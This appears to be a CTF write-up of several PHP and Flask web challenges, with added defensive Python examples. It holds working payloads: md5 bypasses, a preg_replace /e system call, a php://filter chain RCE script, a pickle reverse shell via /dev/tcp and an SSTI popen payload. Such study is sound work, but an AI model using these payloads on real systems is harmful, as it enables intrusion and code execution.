warm up

```php
<?php
include 'next.php';
highlight_file(__FILE__);
$XYCTF = "Warm up";
extract($_GET);
if (isset($_GET['val1']) && isset($_GET['val2']) && $_GET['val1'] != $_GET['val2'] && md5($_GET['val1']) == md5($_GET['val2'])) {
    echo "ez" . "<br>";
} else {
    die("什么情况,这么基础的md5做不来");
}
if (isset($md5) && $md5 == md5($md5)) {
    echo "ezez" . "<br>";
} else {
    die("什么情况,这么基础的md5做不来");
}
if ($XY == $XYCTF) {
    if ($XY != "XYCTF_550102591" && md5($XY) == md5("XYCTF_550102591")) {
        echo $level2;
    } else {
        die("什么情况,这么基础的md5做不来");
    }
} else {
    die("学这么久,传参不会传?");
}
```
md5 weak comparison: bypass it directly with arrays or 0e strings.
For the md5 self-equality check, use the ready-made payload: 0e215962017
extract() lets us overwrite the variables.
It is easy to notice that XYCTF_550102591 is a string specially crafted by the challenge author:
md5('XYCTF_550102591') = '0E937920457786991080577371025051'
exp

```
index.php?val1[]=1&val2[]=2&md5=0e215962017&XYCTF=s878926199a&XY=s878926199a
```
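To see why the payload above passes every check, here is an added example (not from the writeup) that emulates PHP's loose string comparison in Python, verifies that the page's strings really hash to 0e-style "magic" digests, and contrasts the challenge's check with the strict comparison it should have used. The PHP_NUMERIC pattern and the function names are my own.

```python
import hashlib
import hmac
import re

# PHP treats a string like "0e123" as numeric (0 x 10^123 == 0), so two different
# md5 digests that both look like 0e<digits> compare == in PHP although they differ.
PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(digest_hex: str) -> bool:
    """A hex digest of the form 0e<digits only> is what PHP's == collapses to 0."""
    return re.fullmatch(r"0e\d+", digest_hex.lower()) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's string == string: two numeric strings are compared as numbers,
    everything else byte for byte. (Arrays are the other bypass: md5(array) is NULL.)"""
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def weak_check(val1: str, val2: str) -> bool:
    """The challenge's test: val1 != val2 && md5(val1) == md5(val2)."""
    return val1 != val2 and php_loose_eq(md5_hex(val1), md5_hex(val2))


def strict_check(val1: str, val2: str) -> bool:
    """The fix: compare digests byte-exactly and in constant time
    (PHP: hash_equals(md5($a), md5($b)) or ===), so magic hashes no longer collide."""
    return val1 != val2 and hmac.compare_digest(md5_hex(val1), md5_hex(val2))
```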
/LLeeevvveeelll222.php
```php
<?php
highlight_file(__FILE__);
if (isset($_POST['a']) && !preg_match('/[0-9]/', $_POST['a']) && intval($_POST['a'])) {
    echo "操作你O.o";
    echo preg_replace($_GET['a'], $_GET['b'], $_GET['c']);
} else {
    die("有点汗流浃背");
}
```
If intval() is given a non-empty array it returns 1, so we can use that property to get past the check:

```
a[]=1
```

The /e modifier of preg_replace makes it execute the replacement part as code (this modifier only exists in PHP 5; it was removed in PHP 7.0).

```
GET:  ?a=/a/e&b=system('cat /flag')&c="a"
POST: a[]=1
```

After every a has been replaced with the output of cat /flag, isn't the result just the flag?
ezLFI
Filter chains. Download the attached source:

```php
<?php include_once($_REQUEST['file']);
```

Hey, isn't this a filter chain?
I pasted someone else's script and it was solved instantly.
```python
import requests

url = "http://localhost:51650/index.php"
file_to_use = "/etc/passwd"
command = "/readflag"

base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"

conversions = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
    'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
    'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
    'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
    'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2',
}

filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
filters += "convert.iconv.UTF8.UTF7|"

for c in base64_payload[::-1]:
    filters += conversions[c] + "|"

filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
filters += "convert.iconv.UTF8.UTF7|"
filters += "convert.base64-decode"

final_payload = f"php://filter/{filters}/resource={file_to_use}"
print(final_payload)

r = requests.get(url, params={"0": command, "file": final_payload})
print(r.text)
```
login
Directory scan output:

```
[10:12:36] 200 -  547B - /login.php
[10:13:36] 200 -  556B - /register.php
```

Register first, then log in.
After logging in, click redirect and capture the request:

```
RememberMe=gASVLAAAAAAAAACMA2FwcJSMBUxvZ2lulJOUKYGUfZQojARuYW1llIwBYZSMA3B3ZJRoBnViLg==
```

After base64 decoding it looks like pickle data.
So consider pickle deserialization.
After some testing we found that the character r is filtered, i.e. the R opcode cannot be used, so we just use other opcodes:

```python
import base64

op = '''V__setstate__
(S"bash -c 'bash -i >& /dev/tcp/X.X.X.X/port 0>&1'"
ios
system
.'''
print(base64.b64encode(op.encode()))
```

Set the cookie on the site's home page to the payload generated by this script, then catch the reverse shell on our own server.
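To show what that RememberMe cookie actually contains, and how the server could have refused an opcode stream of the kind used above, here is an added example that is not part of the writeup: a static opcode scan with pickletools (nothing is executed) and an allow-list unpickler. The Login class is a local stand-in for app.Login, and INST_STREAM is a constructed stream that uses the INST opcode to call the harmless builtins.len instead of anything else.

```python
import base64
import io
import pickle
import pickletools

# The RememberMe cookie quoted in the writeup: a plain app.Login object.
COOKIE_B64 = "gASVLAAAAAAAAACMA2FwcJSMBUxvZ2lulJOUKYGUfZQojARuYW1llIwBYZSMA3B3ZJRoBnViLg=="
# Constructed protocol-0 stream in the style of the writeup's payload (INST opcode
# 'i', no REDUCE 'R'); it calls builtins.len("abc"), which is harmless.
INST_STREAM = b'(S"abc"\nibuiltins\nlen\n.'


class Login:  # local stand-in for app.Login (the real one lives in the challenge's app module)
    pass


def decode_cookie() -> bytes:
    return base64.b64decode(COOKIE_B64)


def referenced_globals(data: bytes):
    """Static scan with pickletools: every module.name the stream would import
    through GLOBAL, INST or STACK_GLOBAL, without running any of it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":            # module and name come off the stack
            found.append((strings[-2], strings[-1]))
        elif "UNICODE" in op.name or "STRING" in op.name:
            strings.append(arg)
    return found


class LoginOnlyUnpickler(pickle.Unpickler):
    """Allow-list unpickler: GLOBAL, INST and STACK_GLOBAL all go through find_class,
    so anything other than app.Login is refused before it can be called."""
    def find_class(self, module, name):
        if (module, name) == ("app", "Login"):
            return Login
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_loads(data: bytes):
    return LoginOnlyUnpickler(io.BytesIO(data)).load()


def unrestricted_loads(data: bytes):
    return pickle.loads(data)  # what the vulnerable server does


def is_blocked(data: bytes) -> bool:
    try:
        safe_loads(data)
        return False
    except pickle.UnpicklingError:
        return True
```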
give me flag

```php
<?php
include('flag.php');
$FLAG_md5 = md5($FLAG);
if (!isset($_GET['md5']) || !isset($_GET['value'])) {
    highlight_file(__FILE__);
    die($FLAG_md5);
}
$value = $_GET['value'];
$md5 = $_GET['md5'];
$time = time();
if (md5($FLAG . $value . $time) === $md5) {
    echo "yes, give you flag: ";
    echo $FLAG;
}
```

Output of die($FLAG_md5): cc730a4fdf0b9c30e6adbd899d4a1a0f
Couldn't solve it.
我是一个复读机
SSTI. Scanning found /console:

```
Console Locked
The console is locked and needs to be unlocked by entering the PIN. You can find the PIN printed out on the standard output of your shell that runs the server.
```

But it doesn't seem to be of any use.
Brute-forcing the admin account's password gives admin, with password asdqwe.
After logging in there is an IO interface,
except that double braces and brace-percent are banned.
But according to the challenge hint only English may be entered. When we type Chinese characters, double braces appear after them, and only when there are two Chinese characters.
So we guess that non-English characters go through something like a replace, and try SSTI.
Let's try entering:
二1+1三
(later on I sandwich the payload between 一 (yi) characters instead, just because it looks nicer)
Filtered:
" , ' [ ] flag _ os and so on; request is not filtered, so consider using request.args with GET parameters to bypass it.
Construct:

```
?sentence=星(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()星&a=__globals__&b=os&c=cat%20/flag
```

The shell is at parameter c.
fenjing does it in one shot.

ezLFI

```php
<?php include_once($_REQUEST['file']);
```
php://filter can read files
php://input
filter_chains exp

```python
# -*- coding: utf-8 -*-
import requests

url = "http://gz.imxbt.cn:20501/"
file_to_use = "/etc/passwd"
command = "/readflag"

# <?=`$_GET[0]`;;?>
base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"

conversions = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
    'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
    'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
    'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
    'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2',
}

# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"

for c in base64_payload[::-1]:
    filters += conversions[c] + "|"

# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
filters += "convert.base64-decode"

final_payload = f"php://filter/{filters}/resource={file_to_use}"
print(final_payload)

r = requests.get(url, params={
    "0": command,
    # "action": "include",
    "file": final_payload,
})
print(r.text)
```
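Both ezLFI sections above rely on the same php://filter chain. As the detection-side counterpart, added here and not part of either writeup, the following scans access-log lines for php://filter values and flags the chain's fingerprint: many convert.iconv conversions followed by convert.base64-decode. The log lines, the max_iconv threshold and all function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the writeup's target); the third carries
# a short php://filter chain of the kind the generator script above produces.
LOG_LINES = [
    '10.0.0.5 - - [20/Apr/2024:10:12:36 +0000] "GET /index.php?file=/etc/passwd HTTP/1.1" 200 547',
    '10.0.0.5 - - [20/Apr/2024:10:12:40 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 812',
    '10.0.0.9 - - [20/Apr/2024:10:13:01 +0000] "GET /index.php?0=%2Freadflag&file=php://filter/'
    'convert.iconv.UTF8.CSISO2022KR%7Cconvert.base64-encode%7Cconvert.iconv.UTF8.UTF7%7C'
    'convert.iconv.UTF8.UTF16LE%7Cconvert.iconv.UTF8.CSISO2022KR%7Cconvert.iconv.UTF16.EUCTW%7C'
    'convert.iconv.MAC.UCS2%7Cconvert.base64-decode%7Cconvert.base64-encode%7C'
    'convert.iconv.UTF8.UTF7%7Cconvert.base64-decode/resource=/etc/passwd HTTP/1.1" 200 30',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
FILTER_RE = re.compile(r"^php://filter/(.*)/resource=", re.IGNORECASE)


def php_filter_stats(value: str):
    """Break a php://filter/<f1>|<f2>|.../resource=... value into counters, else None."""
    m = FILTER_RE.match(value)
    if not m:
        return None
    chain = [f.lower() for f in m.group(1).split("|")]
    return {
        "filters": len(chain),
        "iconv": sum(f.startswith("convert.iconv.") for f in chain),
        "b64_decode": chain.count("convert.base64-decode"),
    }


def classify_url(url: str, max_iconv: int = 2) -> str:
    """'benign', 'php-filter' (an ordinary filter read) or 'filter-chain' (more than
    max_iconv iconv conversions plus a base64-decode, the generator's fingerprint)."""
    verdict = "benign"
    for values in parse_qs(urlsplit(url).query).values():  # parse_qs also %-decodes
        for stats in map(php_filter_stats, values):
            if stats is None:
                continue
            if stats["iconv"] > max_iconv and stats["b64_decode"]:
                return "filter-chain"
            verdict = "php-filter"
    return verdict


def scan_log(lines):
    """Return (url, verdict) for every request line that parses."""
    return [(m.group(1), classify_url(m.group(1)))
            for m in map(REQUEST_RE.search, lines) if m]
```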
ezRce

```php
<?php
// Only the tail of this script survives on the page; the Phar setup lines are the standard
// ones the remaining calls require, and $a stands for the gadget object from class.php (not shown).
$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$a = null; // placeholder for the gadget object
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>
```
Uploading triggers the "hacker" response.
The backend checks whether the uploaded file contains __halt_compiler();
It also checks the file extension; intercept the request and rename the archive to png:

```
Content-Disposition: form-data; name="file"; filename="phar.jpg"
Content-Type: image/png
```

After the upload succeeds, class.php reads the file with file_get_contents($_POST['file']); exploit this through the phar:// wrapper.
Now we need to get around the check on paths starting with phar.
Method 1:

```
compress.bzip://phar:///test.phar
```

```
compress.bzip://phar:///tmp/ed54ee58cd01e120e27939fe4a64fa92.png
```

Method 2: nested stream wrappers

```
file=php://filter/convert.base64-encode/resource=phar:///tmp/23f1a0f70f076b42b5b49f24ee28f696.png
```

Reference: https://www.yuque.com/infernity/wps/rfpnkn0293l7cp09#ezMake
https://www.cnblogs.com/LAMENTXU/articles/18147817
Full writeups: https://blog.csdn.net/uuzeray/article/details/138274291